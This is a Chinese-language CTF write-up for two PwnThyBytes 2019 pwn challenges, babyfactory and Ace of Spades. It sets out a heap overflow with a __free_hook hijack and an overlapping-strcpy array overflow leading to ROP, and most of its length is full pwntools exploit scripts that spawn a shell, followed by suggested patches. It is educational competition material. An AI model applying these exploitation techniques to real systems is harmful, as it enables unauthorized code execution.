PwnThyBytes CTF 2019 部分 pwn 题解

2019-10-15 约 1514 字 预计阅读 8 分钟

声明:本文 【PwnThyBytes CTF 2019 部分 pwn 题解】 由作者 Ex 于 2019-10-09 09:35:18 首发 先知社区 曾经 浏览数 3136 次

感谢 Ex 的辛苦付出!

欢迎各位喜欢安全的小伙伴们加入星盟安全 UVEgZ3JvdXA6IDU3MDI5NTQ2MQ== 。

还是很不错的国际赛。

源程序打包:https://github.com/Ex-Origin/ctf-writeups/tree/master/pwnthebytesctf2019/pwn

babyfactory

靶机环境是 glibc-2.23 。签到题。

void __fastcall Create(char a1)
{
...
  printf("Enter Day: ", v1);
  _isoc99_scanf("%d", &temp_ptr->day);
  if ( SLOWORD(temp_ptr->day) > 31 || !LOWORD(temp_ptr->day) )
    LOWORD(temp_ptr->day) = 1;
  if ( a1 )
    BYTE2(temp_ptr->day) = 1;
...
}

直接输入一个很大的数字进行byte2字节编辑,即可在下面的函数heap overflow

void __cdecl Edit()
{
  int v0; // [rsp+Ch] [rbp-14h]
  Container *temp_ptr; // [rsp+10h] [rbp-10h]
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Enter Baby IDX: ");
  _isoc99_scanf("%u", &v0);
  if ( global_ptr[v0] )
  {
    temp_ptr = global_ptr[v0];
    printf("Enter new name: ", &v0);
    if ( BYTE2(temp_ptr->day) )
      read(0, (void *)temp_ptr->malloc_ptr, 0x69uLL);
    else
      read(0, (void *)temp_ptr->malloc_ptr, 0x68uLL);
    puts("Done!");
  }
  else
  {
    puts("No such baby!");
  }
}

直接根据堆风水进行地址泄露,劫持hook即可,脚本如下。

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *
import os
import struct
import random
import time
import sys
import signal

salt = os.getenv('GDB_SALT') if (os.getenv('GDB_SALT')) else ''

def clear(signum=None, stack=None):
    print('Strip  all debugging information')
    os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt))
    exit(0)

for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: 
    signal.signal(sig, clear)

# # Create a symbol file for GDB debugging
# try:
#     gdb_symbols = '''

#     '''

#     f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w')
#     f.write(gdb_symbols)
#     f.close()
#     os.system('gcc -g -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt))
#     # os.system('gcc -g -m32 -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt))
# except Exception as e:
#     print(e)

context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'
execve_file = './baby_factory'
# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols{}.so'.replace('{}', salt)})
# sh = process(execve_file)
sh = remote('137.117.216.128', 13373)
elf = ELF(execve_file)
# libc = ELF('./libc-2.27.so')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Create temporary files for GDB debugging
try:
    gdbscript = '''
    b *$rebase(0xF4F)
    '''

    f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w')
    f.write(str(proc.pidof(sh)[0]))
    f.close()

    f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w')
    f.write(gdbscript)
    f.close()
except Exception as e:
    pass

BOY = 0
GIRL = 1

def Create(type, content):
    sh.sendlineafter('> ', '1')
    sh.sendlineafter('> ', str(type + 1))
    sh.sendafter('Name: ', content)
    sh.sendlineafter('Day: ', str(0xffffff))

def Edit(index, content):
    sh.sendlineafter('> ', '2')
    sh.sendlineafter('IDX: ', str(index))
    sh.sendafter('name: ', content)

def List():
    sh.sendlineafter('> ', '3')

def Eliminate(index):
    sh.sendlineafter('> ', '4')
    sh.sendlineafter('IDX: ', str(index))


Create(BOY, '\n')
Create(BOY, '\n')
Create(BOY, '\n')
Edit(0, 'a' * 0x68 + p8(0x91))
Eliminate(0)
Eliminate(1)
Create(GIRL, '\xf8')
List()
sh.recvuntil('GIRL= ')
result = sh.recvuntil('Date', drop=True)
libc_addr = u64(result.ljust(8, '\0')) - 0x3c4bf8
log.success('libc_addr: ' + hex(libc_addr))
Create(BOY, 'b' * 0x60)
Create(GIRL, (p64(0) + p64(0x21)) * 6)
Edit(2, 'd' * 0x68 + p8(0xa1))
# pause()
Eliminate(1)
Create(GIRL, p64(libc_addr + libc.symbols['__free_hook']) + p64(0))
Edit(3, p64(libc_addr + libc.symbols['system']))
Edit(1, p64(libc_addr + libc.search('/bin/sh\0').next()))
Eliminate(3)

sh.interactive()
clear()

由于造成该漏洞的主要原因是,下面代码没有进行置0操作。加上置0操作即可。

if ( a1 )
    BYTE2(temp_ptr->day) = 1;

还有一个漏洞需要修复:

Edit没有对index进行检查,加上检查即可。

void __cdecl Edit()
{
  int v0; // [rsp+Ch] [rbp-14h]
  Container *temp_ptr; // [rsp+10h] [rbp-10h]
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  printf("Enter Baby IDX: ");
  _isoc99_scanf("%u", &v0);
  if ( global_ptr[v0] )
  {
    temp_ptr = global_ptr[v0];
    printf("Enter new name: ", &v0);
    if ( BYTE2(temp_ptr->day) )
      read(0, (void *)temp_ptr->malloc_ptr, 0x69uLL);
    else
      read(0, (void *)temp_ptr->malloc_ptr, 0x68uLL);
    puts("Done!");
  }
  else
  {
    puts("No such baby!");
  }
}

Ace of Spades

靶机环境是 glibc-2.23 。

一个模拟扑克牌的游戏。

漏洞点

主要在于程序员对库函数strcpy的错误使用。

void __cdecl Discard()
{
  if ( amount_in_your_hand )
  {
    abandoned[abandoned_amount++] = card_in_your_hand[0];
    strcpy(card_in_your_hand, &card_in_your_hand[1]);
    --amount_in_your_hand;
  }
}

可能设计的时候仅仅是为了让字符串向前移动一个字节,这里完全可以自己实现,但是这里却使用的是strcpy,对于strcpy函数来说,如果两个参数地址有重叠的部分,难免会出一些问题。

strcpy 分析

通过查看汇编可知,strcpy并不是单纯的逐个字节转移,这样太浪费CPU资源,而是利用SEX2指令进行整块转移,开始先进行地址对齐,为了避免需要取两次内存的情况而浪费IO资源,而且字符串越长,每个单位块的就越大,当然这是建立在浪费内存空间的基础上的,也就是需要大量的汇编代码实现,但是其效率是无可比拟的。

如果原地址和目标地址没有重叠的话并不会产生问题,但是这里恰好相反。

利用下面的程序来检验是否存在问题:

// gcc -m32 main.c
#include <stdio.h>
#include <string.h>

int main()
{
    unsigned char buf[0x100];
    int i, j;
    for(i = 2; i < 52; i++)
    {
        memset(buf, 0, 0x100);
        memset(buf + 0x40, 'a', 0x40);
        for(j = 0; j < i ;j ++)
        {
            buf[j] = 10 + j;
        }
        strcpy(buf, buf + 1);
        for(j = 0; j < i ; j++)
        {
            printf("%03d ",buf[j]);
        }
        puts("");
    }
    return 0;
}

通过分析上面的结果,最终得到下面的payload:

// gcc -m32 main.c
#include <stdio.h>
#include <string.h>

int main()
{
    unsigned char buf[0x100] = "0123456789ABCD";
    strcpy(buf, buf + 1);
    puts(buf);
    return 0;
}

预期结果是123456789ABCD,得到的结果是123456889ABCD

原理分析:

主要问题汇编如下:

__strcpy_sse2 proc near

...
  cmp     byte ptr [ecx+13], 0
  jz      loc_865F0
  ...
   cmp     byte ptr [ecx+14], 0
  jz      loc_86610

  ...
 loc_865F0:
  movlpd  xmm0, qword ptr [ecx]
  movlpd  qword ptr [edx], xmm0
  movlpd  xmm0, qword ptr [ecx+6]
  movlpd  qword ptr [edx+6], xmm0
  mov     eax, edx
  retn

当字符串长度为14时,则意味着[ecx+13]就是0,ecx为buf + 1,由于目标地址和原地址重叠,所以在执行movlpd xmm0, qword ptr [ecx+6] 时,复制了一个重叠的字节。

思路

我们的主要目标是得到尽可能大的分数,这样index就能超出数组长度,造成数组溢出。

void __cdecl Play()
{
    ...
  score = calculate();
  printf("Total points: %u\n", score);
  index = score / 1000;
  printf("Your prize: %s\n", buf[score / 1000]);
  if ( index )
  {
    puts(
      "You can choose to keep this prize or change it for something else, but you won't get it this turn. What will it be?");
    puts("1. Keep.");
    puts("2. Change.");
    printf("Choose: ");
    v0 = get_int();
    v2 = v0;
    if ( v0 == 1 )
    {
      puts("OK, enjoy!");
    }
    else if ( v0 == 2 )
    {
      read(0, buf[index], 0x20u);
    }
    ...
}

通过查看栈布局可得,当index为16时,也就是保存ebp的位置,这样我们就能泄露栈地址,又因为其地址旁还黏连了一个程序地址,这样我们又能泄露程序基地址。

-00000040 buf             dd 11 dup(?)            ; offset
-00000014 var_14          dd ?
-00000010 index           dd ?
-0000000C score           dd ?
-00000008 var_8           dd ?
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)

我们的目标是一个 1 (A),一个 14 (K),三个 100 (Ace of Spades),这样就能得到 16800 的分数,刚好可以完成上面的步骤。

  • 利用 strcpy 漏洞,增加 Ace of Spades 牌的数量。

原本 Ace of Spades 牌仅有一张,但是我们可以利用漏洞让其数量增多。这样我们就能获得足以数组溢出的分数。

amount = {100:1, 1:3, 14:4}

while(True):
    for i in range(14):
        Draw()
    cards = Show()
    if(cards[8] == 1  and cards[7] not in amount.keys()):
        Discard()
        amount[cards[8]] += 1
        break
    Fold()

for i in range(3):
    while(True):
        for i in range(14):
            Draw()
        cards = Show()
        if(cards[8] == 100  and cards[7] not in amount.keys()):
            Discard()
            amount[cards[8]] += 1
            break
        Fold()
  • 不停的增加目标牌的数量,以增加漏洞利用的概率。
for i in range(40):
    while(True):
        for i in range(14):
            Draw()
        cards = Show()
        if(cards[8] in amount.keys() and cards[7] not in amount.keys()):
            Discard()
            amount[cards[8]] += 1
            break

        Fold()
    print(amount)
  • 抽出目标牌从而引发漏洞。
while(True):
    for i in range(5):
        Draw()
    cards = Show()
    if(cards.count(1) == 1 and cards.count(14) == 1):
        break
    Fold()
  • 泄露地址并进行ROP拿shell
sh.sendlineafter('Your choice: ', '3') # Play
sh.recvuntil('Your prize: ')
result = sh.recvuntil('\n')
stack_addr = u32(result[:4])
log.success('stack_addr: ' + hex(stack_addr))
image_base_addr = u32(result[4: 4+4]) - 0x1355
log.success('image_base_addr: ' + hex(image_base_addr))

sh.sendlineafter('Choose: ', '2')
layout = [
    0,
    image_base_addr + elf.plt['puts'],
    image_base_addr + 0x00000b24, # : pop ebp ; ret
    image_base_addr + elf.got['puts'],

    image_base_addr + 0x1094, # push 0 ; call read
    stack_addr - 4,
    0x100
]
sh.send(flat(layout))

sh.sendlineafter('Your choice: ', '6')

result = sh.recvuntil('\n', drop=True)
libc_addr = u32(result[:4]) - libc.symbols['puts']
log.success('libc_addr: ' + hex(libc_addr))

layout = [
    libc_addr + libc.symbols['system'],
    libc_addr + libc.symbols['exit'],
    libc_addr + libc.search('/bin/sh\0').next(),
    0
]
sh.send(flat(layout))

sh.interactive()

完整脚本

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import *
import os
import struct
import random
import time
import sys
import signal

salt = os.getenv('GDB_SALT') if (os.getenv('GDB_SALT')) else ''

def clear(signum=None, stack=None):
    print('Strip  all debugging information')
    os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt))
    exit(0)

for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: 
    signal.signal(sig, clear)

# # Create a symbol file for GDB debugging
# try:
#     gdb_symbols = '''

#     '''

#     f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w')
#     f.write(gdb_symbols)
#     f.close()
#     os.system('gcc -g -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt))
#     # os.system('gcc -g -m32 -shared /tmp/gdb_symbols{}.c -o /tmp/gdb_symbols{}.so'.replace('{}', salt))
# except Exception as e:
#     print(e)

# context.arch = 'amd64'
context.arch = 'i386'
# context.log_level = 'debug'
execve_file = './ace_of_spades'
# sh = process(execve_file, env={'LD_PRELOAD': '/tmp/gdb_symbols{}.so'.replace('{}', salt)})
sh = process(execve_file)
# sh = remote('', 0)
elf = ELF(execve_file)
libc = ELF('./libc-2.23.so')

# Create temporary files for GDB debugging
try:
    gdbscript = '''
    b *$rebase(0x1268)
    '''

    f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w')
    f.write(str(proc.pidof(sh)[0]))
    f.close()

    f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w')
    f.write(gdbscript)
    f.close()
except Exception as e:
    pass

def Draw(): sh.sendlineafter('Your choice: ', '1')
def Discard(): sh.sendlineafter('Your choice: ', '2')
def Fold(): sh.sendlineafter('Your choice: ', '5')
# def Play(): sh.sendlineafter('Your choice: ', '3')
def Show(): 
    sh.sendlineafter('Your choice: ', '4')
    sh.recvuntil('Your hand is:\n')
    result = sh.recvuntil('\x20\n', drop=True)
    # print(result)
    cards = result.split('\x20')
    visual_cards = []
    for v in cards:
        if(v == '\xf0\x9f\x82\xa1'):
            visual_cards += [100]
        else:
            visual_cards +=  [ord(v[3]) % 0x10]

    return visual_cards

amount = {100:1, 1:3, 14:4}

while(True):
    for i in range(14):
        Draw()
    cards = Show()
    if(cards[8] == 1  and cards[7] not in amount.keys()):
        Discard()
        amount[cards[8]] += 1
        break
    Fold()

for i in range(3):
    while(True):
        for i in range(14):
            Draw()
        cards = Show()
        if(cards[8] == 100  and cards[7] not in amount.keys()):
            Discard()
            amount[cards[8]] += 1
            break
        Fold()

for i in range(40):
    while(True):
        for i in range(14):
            Draw()
        cards = Show()
        if(cards[8] in amount.keys() and cards[7] not in amount.keys()):
            Discard()
            amount[cards[8]] += 1
            break

        Fold()
    print(amount)

while(True):
    for i in range(5):
        Draw()
    cards = Show()
    if(cards.count(1) == 1 and cards.count(14) == 1):
        break
    Fold()

sh.sendlineafter('Your choice: ', '3') # Play
sh.recvuntil('Your prize: ')
result = sh.recvuntil('\n')
stack_addr = u32(result[:4])
log.success('stack_addr: ' + hex(stack_addr))
image_base_addr = u32(result[4: 4+4]) - 0x1355
log.success('image_base_addr: ' + hex(image_base_addr))

sh.sendlineafter('Choose: ', '2')
layout = [
    0,
    image_base_addr + elf.plt['puts'],
    image_base_addr + 0x00000b24, # : pop ebp ; ret
    image_base_addr + elf.got['puts'],

    image_base_addr + 0x1094, # push 0 ; call read
    stack_addr - 4,
    0x100
]
sh.send(flat(layout))

sh.sendlineafter('Your choice: ', '6')

result = sh.recvuntil('\n', drop=True)
libc_addr = u32(result[:4]) - libc.symbols['puts']
log.success('libc_addr: ' + hex(libc_addr))

layout = [
    libc_addr + libc.symbols['system'],
    libc_addr + libc.symbols['exit'],
    libc_addr + libc.search('/bin/sh\0').next(),
    0
]
sh.send(flat(layout))

sh.interactive()
clear()

patch方法

根本原因出在strcpy上,直接自己写一段函数进行替换即可。

mov edi, [esp+4]
mov esi, [esp+8]

xor ecx, ecx

again:
cmp ecx, 52
jae end

mov al, [esi]
test al, al
jz over
mov [edi], al
inc edi
inc esi
inc ecx
jmp again

over:
mov [edi], al
end:
ret

上面这段代码可以直接看成strncpy(dst, src, 52),这里还限制了长度,防止非预期的方式造成溢出。

关键词:[‘安全技术’, ‘CTF’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now